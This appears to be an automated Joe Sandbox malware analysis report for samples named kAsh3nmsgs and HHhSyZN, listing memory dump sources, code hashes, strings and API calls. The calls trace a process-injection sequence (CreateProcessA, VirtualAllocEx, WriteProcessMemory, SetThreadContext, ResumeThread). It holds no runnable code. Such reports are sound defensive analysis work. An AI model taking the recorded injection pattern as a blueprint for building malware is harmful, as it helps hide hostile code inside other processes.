                                                                                                                • Opcode Fuzzy Hash: 671ea80f6ce60471eb9ec98a68b4786625b5af97d10b734c754062db6808c805
                                                                                                                • Instruction Fuzzy Hash: B801D675A092858FDB41EBB8E9503EDBFB1EB45304F1041BBC449CB65AEB308D05CB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 90b279d33658472ce2cfb0999d7699f7ded9b06362b5c1bd67c95f8528b5027a
                                                                                                                • Instruction ID: 078d2d8262c02735c7e521d24140beba7346998abd45d50748a332cdd315e96c
                                                                                                                • Opcode Fuzzy Hash: 90b279d33658472ce2cfb0999d7699f7ded9b06362b5c1bd67c95f8528b5027a
                                                                                                                • Instruction Fuzzy Hash: 3501A435B100225BCB64967DA49473EB3DADBC9624F248839F60EC7348DE21DC024395
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2222239885
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-3823777903
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-390881366
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2125118731
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.4170944844.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_6920000_kAsh3nmsgs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                • API String ID: 0-2454687669

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.3%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:217
                                                                                                                Total number of Limit Nodes:12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B2DCCA6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID: >U
                                                                                                                • API String ID: 963392458-1280305422
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B2DCCA6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 015E91B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1768186902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_15e0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0988ADDD,?,?), ref: 0988AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777090043.0000000009880000.00000040.00000800.00020000.00000000.sdmp, Offset: 09880000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_9880000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B2DC878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                APIs
                                                                                                                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0988ADDD,?,?), ref: 0988AE8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777090043.0000000009880000.00000040.00000800.00020000.00000000.sdmp, Offset: 09880000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_9880000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DrawText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2175133113-0
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B2DC958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0B2DC878
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B2DC6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                APIs
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0B2DC958
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 1726664587-0
                                                                                                                APIs
                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0B2DC6CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContextThreadWow64
                                                                                                                • String ID:
                                                                                                                • API String ID: 983334009-0
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B2DC796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B2DFD55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0B2DC796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0B2DC602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                APIs
                                                                                                                • ResumeThread.KERNELBASE(?), ref: 0B2DC602
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 015EE766
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1768186902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_15e0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0B2DFD55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1778985591.000000000B2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_b2d0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost
                                                                                                                • String ID:
                                                                                                                • API String ID: 410705778-0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bc1b2c51e4586315f82fa098245cf6b37644c537e650a64c1ffea35a55f50a43
                                                                                                                • Instruction ID: 961a2017e01fccdadcb01dad49c5bd23d850b30906233a943b1ee188e276a263
                                                                                                                • Opcode Fuzzy Hash: bc1b2c51e4586315f82fa098245cf6b37644c537e650a64c1ffea35a55f50a43
                                                                                                                • Instruction Fuzzy Hash: 8A418F70E0A294DFCB02CFA5C8586EEBFB4AF5B301F0650A6D095E7292C7744948CF65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 889d2579a7d5d2340bc2a8b890b6068bddf574fa378d67fae30bec7f7ee159f4
                                                                                                                • Instruction ID: 7c4cf571f794a131f8dd1e7a802e2d090df65a634606602b034db0703d402d7a
                                                                                                                • Opcode Fuzzy Hash: 889d2579a7d5d2340bc2a8b890b6068bddf574fa378d67fae30bec7f7ee159f4
                                                                                                                • Instruction Fuzzy Hash: AD310470E05218DFDB14CFA9D4446FEBBF5BB59301F02946AD456B3240D7748A44CFA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 88a723be36e932745371025a033e12219cbff0f2a7752b758b6c9c6c50fa0fc5
                                                                                                                • Instruction ID: 62648113fb14709b79491d605dd1c13f701a4e414074b78b46f7b154b8d56291
                                                                                                                • Opcode Fuzzy Hash: 88a723be36e932745371025a033e12219cbff0f2a7752b758b6c9c6c50fa0fc5
                                                                                                                • Instruction Fuzzy Hash: F121F272604240DFDB06DF58D9C0B2ABFB5FBC8318F64C569E9094F296C336D456CAA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e9cfd06cd3bb3d447c9885af2a96ce60092b8f4950d87d7bca41707bb352c490
                                                                                                                • Instruction ID: 8c60447e3821253d5c2fd91d7254119e0328d666c6eb61cd17316884d0c281df
                                                                                                                • Opcode Fuzzy Hash: e9cfd06cd3bb3d447c9885af2a96ce60092b8f4950d87d7bca41707bb352c490
                                                                                                                • Instruction Fuzzy Hash: D62117B5700A019FC364DF29C684A16B7F6FF89610B068669E51AC7BA0DB30FC41CF61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce0b509f39addccd272d6c206c95ebcb4bff82ef4e97d4e96a9f543cb2d23bfd
                                                                                                                • Instruction ID: 819987d0dcdd664bf574aca0e9d0eb16479ab9b53ee855b2e890dd77a992bd97
                                                                                                                • Opcode Fuzzy Hash: ce0b509f39addccd272d6c206c95ebcb4bff82ef4e97d4e96a9f543cb2d23bfd
                                                                                                                • Instruction Fuzzy Hash: 48212971608200DFDB05DF98D5C4B2ABBB5FB94328F20CA6DE9094F356C33AD446CA61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0f2850e61a50ea372a3ac79294fdf88b8fb16212374e44257e4924d7a3ea871
                                                                                                                • Instruction ID: 59779d206ab0971944b5c1cb7bd2520f71584f18c70210f72784e0c0c5705694
                                                                                                                • Opcode Fuzzy Hash: d0f2850e61a50ea372a3ac79294fdf88b8fb16212374e44257e4924d7a3ea871
                                                                                                                • Instruction Fuzzy Hash: A1210071604200DFCB15DF98D984B2ABBB5FB94318F20C96DD80E4F256D33AD446CA61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7bc14685942ae4fd0f194e5132f81f0c8f0e80c03ed38c414369b4cb430532d3
                                                                                                                • Instruction ID: a00f8aa60d37b9ae34d41276af394f95823d11f5b9039c42a40339c76efea59b
                                                                                                                • Opcode Fuzzy Hash: 7bc14685942ae4fd0f194e5132f81f0c8f0e80c03ed38c414369b4cb430532d3
                                                                                                                • Instruction Fuzzy Hash: 42213B75200A009FC364DF2CD684A56BBF5FF89610B06466AE55AC7BA1DB30FC54CF61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 41e84cba84804d9039f37e384489e195bc9fc5d6162cef47cdb92d73bc79016e
                                                                                                                • Instruction ID: 3966d27414dbdae97ce26815676e8fce2a3aa6fd06d7803ba2653a8bd4bc0cbe
                                                                                                                • Opcode Fuzzy Hash: 41e84cba84804d9039f37e384489e195bc9fc5d6162cef47cdb92d73bc79016e
                                                                                                                • Instruction Fuzzy Hash: 602192755093808FDB13CF64D994715BF71FB46218F28C5DAD8498F2A7C33A980ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f6cee5dd401d8334a4385e907032fb45ae58c4f152d9518f2ac2fa7caadbdc6a
                                                                                                                • Instruction ID: 81e5f6f3b9d6a72d3baeec084f2edb586f56a1d1abb8aadd08fe1a3a553fa460
                                                                                                                • Opcode Fuzzy Hash: f6cee5dd401d8334a4385e907032fb45ae58c4f152d9518f2ac2fa7caadbdc6a
                                                                                                                • Instruction Fuzzy Hash: 40119A70E012068FDB14DF68C444AAFFBF1AF48300F16C1A9D418AB361D7359802CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d15c82448072fd46a48aa4d6da224eef4e33d812fd9f07261c92d5708de7b707
                                                                                                                • Instruction ID: c84ab0ba7e8ab7204accac74f461b9203604b32fd00ad1866029121e9062efdd
                                                                                                                • Opcode Fuzzy Hash: d15c82448072fd46a48aa4d6da224eef4e33d812fd9f07261c92d5708de7b707
                                                                                                                • Instruction Fuzzy Hash: 43110370E0120A8FCB18DFA9C444AAEF7F1AF48310F1A85A9E458AB361D7359901CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction ID: d818764784b7e1bfea52938df09c503264e41fca0dd264b50c801e5963e10a62
                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction Fuzzy Hash: 5D11E172504280CFCB02CF54D5C4B1ABF71FB84318F24C6A9D8090F256C33AD45ACBA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767958065.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_154d000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: 1527725194f10179417fb46697a4f9e9a3d8838f26f5ab6c6f1a2dc85f0c0646
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: 7811BB75508280DFDB02CF54C5C4B19BFB1FB84228F24C6AAD8494F296C33AD40ACB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1767912181.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_153d000_HHhSyZN.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1777948182.000000000ADA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ADA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_ada0000_HHhSyZN.jbxd

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:7.5%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:39
                                                                                                                Total number of Limit Nodes:6

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                • API String ID: 0-2392861976
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.4168964405.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_6ca0000_HHhSyZN.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
